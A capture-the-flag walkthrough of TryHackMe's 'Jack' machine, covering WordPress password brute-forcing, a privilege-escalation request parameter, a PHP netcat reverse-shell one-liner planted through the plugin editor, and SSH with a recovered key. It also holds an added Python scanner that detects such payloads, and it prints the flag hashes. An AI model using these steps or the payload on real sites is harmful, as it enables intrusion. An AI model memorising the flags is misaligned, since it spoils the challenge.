NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.
Today let’s play TryHackMe’s Jack at
As usual, we start with an nmap scan to identify the open ports and the services running on them.
:- nmap -A jack.thm
The nmap results show two open ports, 22 and 80, with WordPress hosted on port 80, so we go straight for the WordPress install.
Now we enumerate the WordPress site with wpscan.
:- wpscan --url jack.thm -e
wpscan lists three users, as shown in the figure: wendy, danny and jack.
Now that we have the usernames, let’s brute-force the passwords with wpscan.
:- wpscan --url jack.thm --passwords /usr/share/wordlist/fasttrack.txt
After a few minutes we get a valid username and password.
Now let’s go to wp-login and log in as wendy / changelater.
After logging in we find we only have a normal WordPress user, which makes getting a reverse shell quite a bit harder, but a seasoned pentester can usually find a way through.
So after some research I found an exploit in searchsploit.
Reading through the exploit manually shows how to exploit it with Burp Suite.
This is the parameter that lets us escalate the normal user account to an administrator account.
All we do is submit an update request and capture it with Burp Suite.
After capturing the request we add the exploit parameter to it and set its value to administrator.
It works on the first try: after forwarding the request we check the dashboard and see we now have a WordPress administrator account, so we can try for a reverse shell.
Now that we have an administrator account we put a one-liner netcat reverse shell into the plugin editor, update the file, activate the plugin, and finally we get our shell in netcat.
<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.3.122 7777 >/tmp/f")?>
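As an added defensive example (not part of the original writeup), here is a small Python sweep that walks a WordPress plugin directory and flags PHP files passing a shell or netcat payload, such as the one-liner above, to an exec function, reporting the callback address it finds. The two sample files it scans are constructed inline; the plugin path in the main block is an assumption.

```python
import re
import tempfile
from pathlib import Path

# PHP functions that hand a string to the operating-system shell.
EXEC_SINKS = re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(", re.I)
# Tokens typical of a reverse-shell one-liner: named pipe, interactive shell, netcat, bash tcp device.
SHELL_HINTS = re.compile(r"mkfifo|/bin/(?:ba)?sh|\bn(?:c|cat)\b|/dev/tcp/", re.I)
# Callback address inside the payload: an IPv4 literal followed by a port.
ADDR = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\s+(\d{1,5})\b")


def scan_php_source(src):
    """Return [(line_no, callback)] for lines that feed a shell-looking string to an exec sink."""
    hits = []
    for n, line in enumerate(src.splitlines(), 1):
        if EXEC_SINKS.search(line) and SHELL_HINTS.search(line):
            m = ADDR.search(line)
            hits.append((n, f"{m.group(1)}:{m.group(2)}" if m else None))
    return hits


def scan_plugin_dir(root):
    """Walk a directory (e.g. wp-content/plugins) and map each flagged .php file to its hits."""
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        try:
            hits = scan_php_source(path.read_text(errors="replace"))
        except OSError:
            continue  # unreadable file: skip it rather than abort the sweep
        if hits:
            report[str(path)] = hits
    return report


# Constructed samples: the one-liner from the writeup above, and a harmless plugin stub.
PLANTED = '<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.3.122 7777 >/tmp/f")?>'
BENIGN = "<?php\n// Plugin Name: Hello\nfunction hello_init() { echo 'hi'; }\n"


def demo_scan():
    """Write both samples into a temporary plugin dir, scan it and return {filename: hits}."""
    with tempfile.TemporaryDirectory() as d:
        Path(d, "hello.php").write_text(BENIGN)
        Path(d, "planted.php").write_text(PLANTED)
        return {Path(p).name: h for p, h in scan_plugin_dir(d).items()}


if __name__ == "__main__":
    print(demo_scan())  # {'planted.php': [(1, '10.11.3.122:7777')]}
    # Assumed real-world path; adjust to the site's document root.
    print(scan_plugin_dir("/var/www/html/wp-content/plugins"))
```

Setting define('DISALLOW_FILE_EDIT', true); in wp-config.php removes the plugin editor this step relies on, and file-integrity monitoring on wp-content/plugins catches the modified file itself.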
After getting the shell I enumerated every accessible directory and file and found some files in /var/backups. There I got the user’s private key, and from the passwd file I found that the user is jack.
Now that we have the user’s private key, we can SSH in as that user easily.
:- ssh -i id_rsa firstname.lastname@example.org
And here we get the user flag. Our next target is the root flag.
user.txt = 0052f7829e48752f2e7bf50f1231548a
root.txt = b8b63a861cc09e853f29d8055d64bffb
Author – Puckiestyle